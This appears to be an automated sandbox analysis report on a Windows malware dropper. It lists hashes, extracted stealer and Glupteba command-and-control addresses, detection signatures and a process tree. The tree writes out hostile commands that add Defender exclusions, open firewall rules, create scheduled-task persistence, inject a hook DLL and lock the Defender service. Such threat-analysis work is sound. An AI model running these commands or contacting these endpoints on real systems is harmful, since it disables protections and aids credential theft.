Analysis
-
max time kernel
83s -
max time network
163s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
26-01-2024 19:05
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20231129-en
General
-
Target
file.exe
-
Size
23KB
-
MD5
13e50553cf74404e0667de093b05d4bb
-
SHA1
d2b4e780b13305b25cba7cd3b2259d94d84120a8
-
SHA256
8f1db790b8dcd0cfa72966ee8702bfd44c52600a290e40285b21bd6f356c12c5
-
SHA512
23f9cbf9e32dbe4f5238e10d9b41d47adb80815122d69c2717e35b1a166c0b45a4767bba52c8c793a2d73f8abe4d9abd0ac57e62b1490d4ef86b3ec639d2a18c
-
SSDEEP
384:2uBq0csxekW8SepChIaSpZAuIrl/6Hx4QZb7DFN24uNDZOEv+45GoGCJEF8ZpHbY:cS8oHhxNhuLOyrEFiR1tM
Malware Config
Extracted
fabookie
http://app.alie3ksgaa.com/check/safe
Extracted
stealc
http://185.172.128.79
-
url_path
/3886d2276f6914c4.php
Signatures
-
Detect Fabookie payload 1 IoCs
resource yara_rule behavioral2/memory/4852-175-0x0000000003B30000-0x0000000003C5E000-memory.dmp family_fabookie -
Glupteba payload 10 IoCs
resource yara_rule behavioral2/memory/4016-73-0x0000000005000000-0x00000000058EB000-memory.dmp family_glupteba behavioral2/memory/4016-86-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral2/memory/776-88-0x0000000005090000-0x000000000597B000-memory.dmp family_glupteba behavioral2/memory/776-115-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral2/memory/776-179-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral2/memory/4016-208-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral2/memory/776-315-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral2/memory/4016-319-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral2/memory/776-446-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba behavioral2/memory/4016-481-0x0000000000400000-0x0000000002EF4000-memory.dmp family_glupteba -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths file.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\file.exe = "0" file.exe -
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2544 netsh.exe 2400 netsh.exe -
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation file.exe Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation Install.exe -
Drops startup file 8 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iNOutnvBzS7VyIcd3QW0TW18.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yIS535O5hMfIdm4foPRdBBaf.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\70cvJz95maFdse1ESAZ2hNWv.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WgEGvujfTiJJdzrgruNGSNWN.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vd9KHaxeD03MkfHRtSrDYtyt.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q7AIhtPlV1Zt4eSRRdy5AUdl.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\935s9DiWoD3NItdKR2rJ03Av.bat AddInProcess32.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zHdN2pdo959AZUz71OU5VnQK.bat AddInProcess32.exe -
Executes dropped EXE 17 IoCs
pid Process 776 kT0tNJPKecbntLbNhYd5uovn.exe 4016 xiavoZITb0bNItqGrk4nZwtI.exe 4852 ky27yZ6YV8xHp2SaBP1kgpLb.exe 3796 XfyLoovFbzb13H8tHHG6a3c8.exe 2116 QaJVKykb0dedK4BtDPMEdoFR.exe 4356 67yCS8RSVFzLiDd59SVZCjTv.exe 4204 Install.exe 4700 BroomSetup.exe 3360 67yCS8RSVFzLiDd59SVZCjTv.exe 4412 Install.exe 3224 87z6LeGCVlh5OF7a0051UFO0.exe 1688 67yCS8RSVFzLiDd59SVZCjTv.exe 3036 nse3546.tmp 2560 67yCS8RSVFzLiDd59SVZCjTv.exe 4392 67yCS8RSVFzLiDd59SVZCjTv.exe 400 Assistant_106.0.4998.16_Setup.exe_sfx.exe 1960 assistant_installer.exe -
Loads dropped DLL 11 IoCs
pid Process 2116 QaJVKykb0dedK4BtDPMEdoFR.exe 4356 67yCS8RSVFzLiDd59SVZCjTv.exe 3360 67yCS8RSVFzLiDd59SVZCjTv.exe 2116 QaJVKykb0dedK4BtDPMEdoFR.exe 1688 67yCS8RSVFzLiDd59SVZCjTv.exe 2560 67yCS8RSVFzLiDd59SVZCjTv.exe 4392 67yCS8RSVFzLiDd59SVZCjTv.exe 3036 nse3546.tmp 3036 nse3546.tmp 1960 assistant_installer.exe 1960 assistant_installer.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x0007000000023152-147.dat upx behavioral2/files/0x0007000000023152-153.dat upx behavioral2/memory/4356-166-0x00000000008F0000-0x0000000000DD8000-memory.dmp upx behavioral2/files/0x0007000000023152-170.dat upx behavioral2/memory/3360-178-0x00000000008F0000-0x0000000000DD8000-memory.dmp upx behavioral2/files/0x0007000000023152-190.dat upx behavioral2/files/0x000600000002316c-206.dat upx behavioral2/memory/1688-215-0x0000000000FC0000-0x00000000014A8000-memory.dmp upx behavioral2/files/0x0007000000023152-225.dat upx behavioral2/files/0x0007000000023152-246.dat upx behavioral2/memory/2560-253-0x00000000008F0000-0x0000000000DD8000-memory.dmp upx behavioral2/memory/4392-261-0x00000000008F0000-0x0000000000DD8000-memory.dmp upx -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths file.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions file.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\file.exe = "0" file.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA file.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file.exe -
Enumerates connected drives 3 TTPs 4 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\D: 67yCS8RSVFzLiDd59SVZCjTv.exe File opened (read-only) \??\F: 67yCS8RSVFzLiDd59SVZCjTv.exe File opened (read-only) \??\D: 67yCS8RSVFzLiDd59SVZCjTv.exe File opened (read-only) \??\F: 67yCS8RSVFzLiDd59SVZCjTv.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 16 pastebin.com 19 pastebin.com -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 2572 set thread context of 4216 2572 file.exe 92 -
Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2964 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 1 IoCs
pid pid_target Process procid_target 4816 3036 WerFault.exe 108 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 nse3546.tmp Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString nse3546.tmp -
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3332 schtasks.exe 4616 schtasks.exe 3164 schtasks.exe 4636 schtasks.exe 2544 schtasks.exe 5096 schtasks.exe 4528 schtasks.exe 2584 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1552 timeout.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 67yCS8RSVFzLiDd59SVZCjTv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e 67yCS8RSVFzLiDd59SVZCjTv.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e 67yCS8RSVFzLiDd59SVZCjTv.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
pid Process 2572 file.exe 2572 file.exe 2284 powershell.exe 2284 powershell.exe 3036 nse3546.tmp 3036 nse3546.tmp 3356 powershell.exe 3356 powershell.exe 1884 powershell.exe 1884 powershell.exe 3356 powershell.exe 1884 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 2572 file.exe Token: SeDebugPrivilege 4216 AddInProcess32.exe Token: SeDebugPrivilege 2284 powershell.exe Token: SeDebugPrivilege 3356 powershell.exe Token: SeDebugPrivilege 1884 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4700 BroomSetup.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2572 wrote to memory of 2284 2572 file.exe 89 PID 2572 wrote to memory of 2284 2572 file.exe 89 PID 2572 wrote to memory of 2284 2572 file.exe 89 PID 2572 wrote to memory of 2336 2572 file.exe 91 PID 2572 wrote to memory of 2336 2572 file.exe 91 PID 2572 wrote to memory of 2336 2572 file.exe 91 PID 2572 wrote to memory of 4216 2572 file.exe 92 PID 2572 wrote to memory of 4216 2572 file.exe 92 PID 2572 wrote to memory of 4216 2572 file.exe 92 PID 2572 wrote to memory of 4216 2572 file.exe 92 PID 2572 wrote to memory of 4216 2572 file.exe 92 PID 2572 wrote to memory of 4216 2572 file.exe 92 PID 2572 wrote to memory of 4216 2572 file.exe 92 PID 2572 wrote to memory of 4216 2572 file.exe 92 PID 4216 wrote to memory of 776 4216 AddInProcess32.exe 93 PID 4216 wrote to memory of 776 4216 AddInProcess32.exe 93 PID 4216 wrote to memory of 776 4216 AddInProcess32.exe 93 PID 4216 wrote to memory of 4016 4216 AddInProcess32.exe 94 PID 4216 wrote to memory of 4016 4216 AddInProcess32.exe 94 PID 4216 wrote to memory of 4016 4216 AddInProcess32.exe 94 PID 4216 wrote to memory of 4852 4216 AddInProcess32.exe 95 PID 4216 wrote to memory of 4852 4216 AddInProcess32.exe 95 PID 4216 wrote to memory of 3796 4216 AddInProcess32.exe 97 PID 4216 wrote to memory of 3796 4216 AddInProcess32.exe 97 PID 4216 wrote to memory of 3796 4216 AddInProcess32.exe 97 PID 4216 wrote to memory of 2116 4216 AddInProcess32.exe 99 PID 4216 wrote to memory of 2116 4216 AddInProcess32.exe 99 PID 4216 wrote to memory of 2116 4216 AddInProcess32.exe 99 PID 4216 wrote to memory of 4356 4216 AddInProcess32.exe 103 PID 4216 wrote to memory of 4356 4216 AddInProcess32.exe 103 PID 4216 wrote to memory of 4356 4216 AddInProcess32.exe 103 PID 3796 wrote to memory of 4204 3796 XfyLoovFbzb13H8tHHG6a3c8.exe 102 PID 3796 wrote to memory of 4204 3796 XfyLoovFbzb13H8tHHG6a3c8.exe 102 PID 3796 wrote to memory of 4204 3796 XfyLoovFbzb13H8tHHG6a3c8.exe 102 PID 2116 wrote to memory of 4700 2116 QaJVKykb0dedK4BtDPMEdoFR.exe 105 PID 2116 wrote to memory of 4700 2116 QaJVKykb0dedK4BtDPMEdoFR.exe 105 PID 2116 wrote to memory of 4700 2116 QaJVKykb0dedK4BtDPMEdoFR.exe 105 PID 4356 wrote to memory of 3360 4356 67yCS8RSVFzLiDd59SVZCjTv.exe 106 PID 4356 wrote to memory of 3360 4356 67yCS8RSVFzLiDd59SVZCjTv.exe 106 PID 4356 wrote to memory of 3360 4356 67yCS8RSVFzLiDd59SVZCjTv.exe 106 PID 4204 wrote to memory of 4412 4204 Install.exe 107 PID 4204 wrote to memory of 4412 4204 Install.exe 107 PID 4204 wrote to memory of 4412 4204 Install.exe 107 PID 4216 wrote to memory of 3224 4216 AddInProcess32.exe 112 PID 4216 wrote to memory of 3224 4216 AddInProcess32.exe 112 PID 4216 wrote to memory of 3224 4216 AddInProcess32.exe 112 PID 4356 wrote to memory of 1688 4356 67yCS8RSVFzLiDd59SVZCjTv.exe 111 PID 4356 wrote to memory of 1688 4356 67yCS8RSVFzLiDd59SVZCjTv.exe 111 PID 4356 wrote to memory of 1688 4356 67yCS8RSVFzLiDd59SVZCjTv.exe 111 PID 2116 wrote to memory of 3036 2116 QaJVKykb0dedK4BtDPMEdoFR.exe 108 PID 2116 wrote to memory of 3036 2116 QaJVKykb0dedK4BtDPMEdoFR.exe 108 PID 2116 wrote to memory of 3036 2116 QaJVKykb0dedK4BtDPMEdoFR.exe 108 PID 4356 wrote to memory of 2560 4356 67yCS8RSVFzLiDd59SVZCjTv.exe 109 PID 4356 wrote to memory of 2560 4356 67yCS8RSVFzLiDd59SVZCjTv.exe 109 PID 4356 wrote to memory of 2560 4356 67yCS8RSVFzLiDd59SVZCjTv.exe 109 PID 2560 wrote to memory of 4392 2560 67yCS8RSVFzLiDd59SVZCjTv.exe 113 PID 2560 wrote to memory of 4392 2560 67yCS8RSVFzLiDd59SVZCjTv.exe 113 PID 2560 wrote to memory of 4392 2560 67yCS8RSVFzLiDd59SVZCjTv.exe 113 PID 4700 wrote to memory of 4608 4700 BroomSetup.exe 114 PID 4700 wrote to memory of 4608 4700 BroomSetup.exe 114 PID 4700 wrote to memory of 4608 4700 BroomSetup.exe 114 PID 4412 wrote to memory of 1464 4412 Install.exe 118 PID 4412 wrote to memory of 1464 4412 Install.exe 118 PID 4412 wrote to memory of 1464 4412 Install.exe 118 -
System policy modification 1 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- UAC bypass
- Windows security bypass
- Checks computer location settings
- Windows security modification
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:2572 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\file.exe" -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2284
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"2⤵PID:2336
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"2⤵
- Drops startup file
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4216 -
C:\Users\Admin\Pictures\kT0tNJPKecbntLbNhYd5uovn.exe"C:\Users\Admin\Pictures\kT0tNJPKecbntLbNhYd5uovn.exe"3⤵
- Executes dropped EXE
PID:776 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3356
-
-
C:\Users\Admin\Pictures\kT0tNJPKecbntLbNhYd5uovn.exe"C:\Users\Admin\Pictures\kT0tNJPKecbntLbNhYd5uovn.exe"4⤵PID:4092
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:3980
-
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"5⤵PID:3392
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes6⤵
- Modifies Windows Firewall
PID:2544
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:2492
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile5⤵PID:3248
-
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe5⤵PID:392
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:2620
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:3332
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f6⤵PID:4548
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:4012
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile6⤵PID:2512
-
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll6⤵PID:2992
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F6⤵
- Creates scheduled task(s)
PID:4636
-
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"6⤵PID:2332
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵PID:1468
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)8⤵
- Launches sc.exe
PID:2964
-
-
-
-
-
-
-
C:\Users\Admin\Pictures\xiavoZITb0bNItqGrk4nZwtI.exe"C:\Users\Admin\Pictures\xiavoZITb0bNItqGrk4nZwtI.exe"3⤵
- Executes dropped EXE
PID:4016 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -nologo -noprofile4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1884
-
-
